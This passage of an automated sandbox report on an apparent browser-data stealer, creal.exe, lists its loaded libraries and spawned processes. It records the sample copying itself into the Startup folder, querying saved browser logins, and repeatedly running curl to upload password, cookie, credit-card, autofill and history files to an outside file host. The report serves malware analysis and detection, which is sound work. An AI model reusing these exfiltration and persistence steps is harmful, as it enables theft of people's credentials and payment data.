            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83D098028_2_00007FF8F83D0980
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F83CC48028_2_00007FF8F83CC480
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F840100028_2_00007FF8F8401000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84018E028_2_00007FF8F84018E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84012B028_2_00007FF8F84012B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8427FC928_2_00007FF8F8427FC9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8427BF028_2_00007FF8F8427BF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D5DC028_2_00007FF8F84D5DC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DD96028_2_00007FF8F84DD960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D99A028_2_00007FF8F84D99A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491FE628_2_00007FF8F8491FE6
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BBD8028_2_00007FF8F84BBD80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DDE3028_2_00007FF8F84DDE30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849154128_2_00007FF8F8491541
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849159128_2_00007FF8F8491591
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84921F328_2_00007FF8F84921F3
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849149C28_2_00007FF8F849149C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84924EB28_2_00007FF8F84924EB
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84C8AA028_2_00007FF8F84C8AA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491A0F28_2_00007FF8F8491A0F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84916FE28_2_00007FF8F84916FE
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8498BE028_2_00007FF8F8498BE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84FCDA028_2_00007FF8F84FCDA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849143D28_2_00007FF8F849143D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B32E028_2_00007FF8FF5B32E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B39F028_2_00007FF8FF5B39F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B2ED028_2_00007FF8FF5B2ED0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5B27A028_2_00007FF8FF5B27A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8FF5C530C28_2_00007FF8FF5C530C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8E597A550 appears 165 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F83C3880 appears 114 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F850CD8F appears 129 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF7C3CE2B30 appears 47 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8E59794B0 appears 134 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F849132A appears 235 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F850D551 appears 31 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F83C3800 appears 51 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8F850CDA1 appears 544 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: String function: 00007FF8E59A0F90 appears 34 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E68BA550 appears 165 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E7143800 appears 51 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E724CD8F appears 114 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF67A602B30 appears 47 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E71D132A appears 121 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E7143880 appears 114 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E68B94B0 appears 134 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E724CDA1 appears 333 times
            Source: C:\Users\user\Desktop\creal.exeCode function: String function: 00007FF8E68E0F90 appears 34 times
            Source: _overlapped.pyd.0.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.26.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.26.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.dr, Static PE information: No import functions for PE file found
            Source: python3.dll.26.dr, Static PE information: No import functions for PE file found
            Source: classification engine, Classification label: mal100.troj.adwa.spyw.evad.winEXE@76/190@4/5
            Source: C:\Users\user\Desktop\creal.exe, Code function: 0_2_00007FF67A608570 GetLastError, FormatMessageW, WideCharToMultiByte
            Source: C:\Users\user\Desktop\creal.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
            Source: C:\Users\user\Desktop\creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75242
            Source: creal.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\creal.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\creal.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: creal.exe Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: creal.exe Virustotal: Detection: 79%
            Source: creal.exe ReversingLabs: Detection: 75%
            Source: C:\Users\user\Desktop\creal.exe File read: C:\Users\user\Desktop\creal.exe
            Source: unknown Process created: C:\Users\user\Desktop\creal.exe "C:\Users\user\Desktop\creal.exe"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Users\user\Desktop\creal.exe "C:\Users\user\Desktop\creal.exe"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
            Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: vcruntime140.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: libffi-8.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: libcrypto-3.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: libssl-3.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: sqlite3.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\creal.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll
            Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: wininet.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\dllhost.exe Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: vcruntime140.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: libffi-8.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: libcrypto-3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: libssl-3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: libcrypto-3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: sqlite3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: dpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
